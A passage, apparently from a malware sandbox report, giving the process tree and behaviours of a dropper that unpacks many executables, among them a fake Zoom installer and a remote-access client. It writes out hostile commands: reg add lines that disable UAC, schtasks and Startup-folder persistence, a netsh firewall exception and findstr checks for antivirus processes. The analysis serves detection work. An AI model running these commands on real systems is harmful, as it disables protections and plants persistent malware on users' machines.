msiexec.exe Token: SeCreatePermanentPrivilege 2508 msiexec.exe Token: SeBackupPrivilege 2508 msiexec.exe Token: SeRestorePrivilege 2508 msiexec.exe Token: SeShutdownPrivilege 2508 msiexec.exe Token: SeDebugPrivilege 2508 msiexec.exe Token: SeAuditPrivilege 2508 msiexec.exe Token: SeSystemEnvironmentPrivilege 2508 msiexec.exe Token: SeChangeNotifyPrivilege 2508 msiexec.exe Token: SeRemoteShutdownPrivilege 2508 msiexec.exe Token: SeUndockPrivilege 2508 msiexec.exe Token: SeSyncAgentPrivilege 2508 msiexec.exe Token: SeEnableDelegationPrivilege 2508 msiexec.exe Token: SeManageVolumePrivilege 2508 msiexec.exe Token: SeImpersonatePrivilege 2508 msiexec.exe Token: SeCreateGlobalPrivilege 2508 msiexec.exe Token: SeCreateTokenPrivilege 2508 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2508 msiexec.exe Token: SeLockMemoryPrivilege 2508 msiexec.exe Token: SeIncreaseQuotaPrivilege 2508 msiexec.exe Token: SeMachineAccountPrivilege 2508 msiexec.exe Token: SeTcbPrivilege 2508 msiexec.exe Token: SeSecurityPrivilege 2508 msiexec.exe Token: SeTakeOwnershipPrivilege 2508 msiexec.exe Token: SeLoadDriverPrivilege 2508 msiexec.exe Token: SeSystemProfilePrivilege 2508 msiexec.exe Token: SeSystemtimePrivilege 2508 msiexec.exe Token: SeProfSingleProcessPrivilege 2508 msiexec.exe Token: SeIncBasePriorityPrivilege 2508 msiexec.exe Token: SeCreatePagefilePrivilege 2508 msiexec.exe Token: SeCreatePermanentPrivilege 2508 msiexec.exe Token: SeBackupPrivilege 2508 msiexec.exe Token: SeRestorePrivilege 2508 msiexec.exe Token: SeShutdownPrivilege 2508 msiexec.exe Token: SeDebugPrivilege 2508 msiexec.exe Token: SeAuditPrivilege 2508 msiexec.exe Token: SeSystemEnvironmentPrivilege 2508 msiexec.exe Token: SeChangeNotifyPrivilege 2508 msiexec.exe Token: SeRemoteShutdownPrivilege 2508 msiexec.exe Token: SeUndockPrivilege 2508 msiexec.exe Token: SeSyncAgentPrivilege 2508 msiexec.exe Token: SeEnableDelegationPrivilege 2508 msiexec.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 2508 msiexec.exe 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 2508 msiexec.exe 2508 msiexec.exe 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 2508 msiexec.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com 1556 Surrey.com -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 1140 22.exe 1916 msinfo32.exe 3916 Network.exe 5512 msinfo32.exe 1784 Windows Shell Interactive.exe 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 1140 22.exe 1916 msinfo32.exe 3916 Network.exe 5512 msinfo32.exe 1784 Windows Shell Interactive.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 892 wrote to memory of 3836 892 New Text Document mod.exe 77 PID 892 wrote to memory of 3836 892 New Text Document mod.exe 77 PID 892 wrote to memory of 3476 892 New Text Document mod.exe 79 PID 892 wrote to memory of 3476 892 New Text Document mod.exe 79 PID 892 wrote to memory of 3476 892 New Text Document mod.exe 79 PID 3476 wrote to memory of 2416 3476 Synaptics.exe 80 PID 3476 wrote to memory of 2416 3476 Synaptics.exe 80 PID 3836 wrote to memory of 3320 3836 ._cache_New Text Document mod.exe 82 PID 3836 wrote to memory of 3320 3836 ._cache_New Text Document mod.exe 82 PID 3836 wrote to memory of 3320 3836 ._cache_New Text Document mod.exe 82 PID 2416 wrote to memory of 3560 2416 ._cache_Synaptics.exe 83 PID 2416 wrote to memory of 3560 2416 ._cache_Synaptics.exe 83 PID 2416 wrote to memory of 3560 2416 ._cache_Synaptics.exe 83 PID 3320 wrote to memory of 4576 3320 1.exe 84 PID 3320 wrote to memory of 4576 3320 1.exe 84 PID 3320 wrote to memory of 4576 3320 1.exe 84 PID 3836 wrote to memory of 948 3836 ._cache_New Text Document mod.exe 86 PID 3836 wrote to memory of 948 3836 ._cache_New Text Document mod.exe 86 PID 3836 wrote to memory of 948 3836 ._cache_New Text Document mod.exe 86 PID 4576 wrote to memory of 860 4576 cmd.exe 87 PID 4576 wrote to memory of 860 4576 cmd.exe 87 PID 4576 wrote to memory of 860 4576 cmd.exe 87 PID 4576 wrote to memory of 4644 4576 cmd.exe 88 PID 4576 wrote to memory of 4644 4576 cmd.exe 88 PID 4576 wrote to memory of 4644 4576 cmd.exe 88 PID 4576 wrote to memory of 3848 4576 cmd.exe 90 PID 4576 wrote to memory of 3848 4576 cmd.exe 90 PID 4576 wrote to memory of 3848 4576 cmd.exe 90 PID 4576 wrote to memory of 2492 4576 cmd.exe 91 PID 4576 wrote to memory of 2492 4576 cmd.exe 91 PID 4576 wrote to memory of 2492 4576 cmd.exe 91 PID 3836 wrote to memory of 4340 3836 ._cache_New Text Document mod.exe 92 PID 3836 wrote to memory of 4340 3836 ._cache_New Text Document mod.exe 92 PID 3836 wrote to memory of 4340 3836 ._cache_New Text Document mod.exe 92 PID 4576 wrote to memory of 4080 4576 cmd.exe 93 PID 4576 wrote to memory of 4080 4576 cmd.exe 93 PID 4576 wrote to memory of 4080 4576 cmd.exe 93 PID 4576 wrote to memory of 4140 4576 cmd.exe 115 PID 4576 wrote to memory of 4140 4576 cmd.exe 115 PID 4576 wrote to memory of 4140 4576 cmd.exe 115 PID 4576 wrote to memory of 4640 4576 cmd.exe 95 PID 4576 wrote to memory of 4640 4576 cmd.exe 95 PID 4576 wrote to memory of 4640 4576 cmd.exe 95 PID 4576 wrote to memory of 1212 4576 cmd.exe 96 PID 4576 wrote to memory of 1212 4576 cmd.exe 96 PID 4576 wrote to memory of 1212 4576 cmd.exe 96 PID 4340 wrote to memory of 2508 4340 zoom_invitecode=23884232.zoom.exe 97 PID 4340 wrote to memory of 2508 4340 zoom_invitecode=23884232.zoom.exe 97 PID 4340 wrote to memory of 2508 4340 zoom_invitecode=23884232.zoom.exe 97 PID 3836 wrote to memory of 3100 3836 ._cache_New Text Document mod.exe 98 PID 3836 wrote to memory of 3100 3836 ._cache_New Text Document mod.exe 98 PID 3836 wrote to memory of 3100 3836 ._cache_New Text Document mod.exe 98 PID 4576 wrote to memory of 4428 4576 cmd.exe 100 PID 4576 wrote to memory of 4428 4576 cmd.exe 100 PID 4576 wrote to memory of 4428 4576 cmd.exe 100 PID 4576 wrote to memory of 1556 4576 cmd.exe 101 PID 4576 wrote to memory of 1556 4576 cmd.exe 101 PID 4576 wrote to memory of 1556 4576 cmd.exe 101 PID 3836 wrote to memory of 3744 3836 ._cache_New Text Document mod.exe 102 PID 3836 wrote to memory of 3744 3836 ._cache_New Text Document mod.exe 102 PID 3836 wrote to memory of 3744 3836 ._cache_New Text Document mod.exe 102 PID 3744 wrote to memory of 2524 3744 ApiUpdater.exe 104 PID 3744 wrote to memory of 2524 3744 ApiUpdater.exe 104 PID 3744 wrote to memory of 2524 3744 ApiUpdater.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3300
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"3⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Users\Admin\AppData\Local\Temp\a\1.exe"C:\Users\Admin\AppData\Local\Temp\a\1.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
PID:4644
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:2492
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6349776⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Gtk6⤵
- System Location Discovery: System Language Discovery
PID:4140
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Constitution" Wagon6⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com6⤵
- System Location Discovery: System Language Discovery
PID:1212
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q6⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\634977\Surrey.comSurrey.com Q6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1556
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:1448
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\test.exe"C:\Users\Admin\AppData\Local\Temp\a\test.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:948
-
-
C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"5⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2508
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3100
-
-
C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"4⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- System Location Discovery: System Language Discovery
PID:2524 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1268
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:4292 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1012 -
C:\ProgramData\Bitdefender\$77-Bitdefender.exeC:\ProgramData\Bitdefender\$77-Bitdefender.exe7⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2620 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8⤵
- System Location Discovery: System Language Discovery
PID:5104 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1676
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"8⤵PID:2624
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\windows.exe"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4740 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit5⤵
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC8C.tmp.bat""5⤵
- System Location Discovery: System Language Discovery
PID:3064 -
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1568
-
-
C:\Users\Admin\AppData\Roaming\system.exe"C:\Users\Admin\AppData\Roaming\system.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\T.exe"C:\Users\Admin\AppData\Local\Temp\a\T.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force5⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:4304
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force5⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3896
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\36.exe"C:\Users\Admin\AppData\Local\Temp\a\36.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 3925⤵
- Program crash
PID:4148
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\access.exe"C:\Users\Admin\AppData\Local\Temp\a\access.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4700
-
-
C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"4⤵PID:3644
-
C:\Windows\TEMP\{97F4DFCB-E950-48D2-813C-FD6D59C5C400}\.cr\QGFQTHIU.exe"C:\Windows\TEMP\{97F4DFCB-E950-48D2-813C-FD6D59C5C400}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe" -burn.filehandle.attached=616 -burn.filehandle.self=6125⤵PID:3532
-
C:\Windows\TEMP\{46C548A1-AF54-44B8-9B40-D2ECD1D8DB53}\.ba\msn.exeC:\Windows\TEMP\{46C548A1-AF54-44B8-9B40-D2ECD1D8DB53}\.ba\msn.exe6⤵PID:3256
-
C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exeC:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe7⤵PID:5072
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵PID:1172
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe9⤵PID:836
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"4⤵PID:2492
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵PID:5908
-
C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"6⤵PID:7116
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\020ad751-73cc-45f5-90ee-065439e9c2f3.bat"7⤵PID:6596
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5892
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"4⤵PID:1172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 20245⤵
- Program crash
PID:4844
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"4⤵PID:1548
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3440
-
-
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"5⤵PID:5584
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:5496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2cga16j5Csql.bat" "6⤵PID:4592
-
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:6240
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6624
-
-
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"7⤵PID:6288
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:7076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5Wnpa61VeNZ2.bat" "8⤵PID:6680
-
C:\Windows\SysWOW64\chcp.comchcp 650019⤵PID:6304
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6288 -s 22848⤵
- Program crash
PID:1924
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 20166⤵
- Program crash
PID:4992
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"4⤵PID:1968
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2460
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"4⤵PID:1984
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5344
-
-
C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"5⤵PID:3708
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:5836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"4⤵PID:1484
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵PID:4120
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- Modifies registry key
PID:3852
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"5⤵PID:4592
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"6⤵PID:2312
-
C:\ProgramData\GoogleDat\GoogleUpdate.exeC:\ProgramData\GoogleDat\GoogleUpdate.exe7⤵PID:4716
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8⤵PID:5152
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵
- Modifies registry key
PID:6212
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe8⤵PID:5344
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"4⤵PID:5716
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Users\Admin\AppData\Local\Temp\a\Update.exe"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe"C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4808 -
C:\Windows\Temp\{2D44A5E1-CE3F-41E3-B407-C25AAE47781C}\.cr\BQEHIQAG.exe"C:\Windows\Temp\{2D44A5E1-CE3F-41E3-B407-C25AAE47781C}\.cr\BQEHIQAG.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe" -burn.filehandle.attached=724 -burn.filehandle.self=7286⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4816 -
C:\Windows\Temp\{7E5989CC-6BBF-4997-8689-0DFECE7DF881}\.ba\DBDownloader.exeC:\Windows\Temp\{7E5989CC-6BBF-4997-8689-0DFECE7DF881}\.ba\DBDownloader.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1820 -
C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exeC:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- System Location Discovery: System Language Discovery
PID:1268 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe10⤵PID:5748
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4612 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- System Location Discovery: System Language Discovery
PID:4292 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:952
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"6⤵PID:5084
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\99999.exe"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"5⤵
- Executes dropped EXE
PID:4628 -
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:1104 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\22.exe"C:\Users\Admin\AppData\Local\Temp\a\22.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4792 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4660
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1916 -
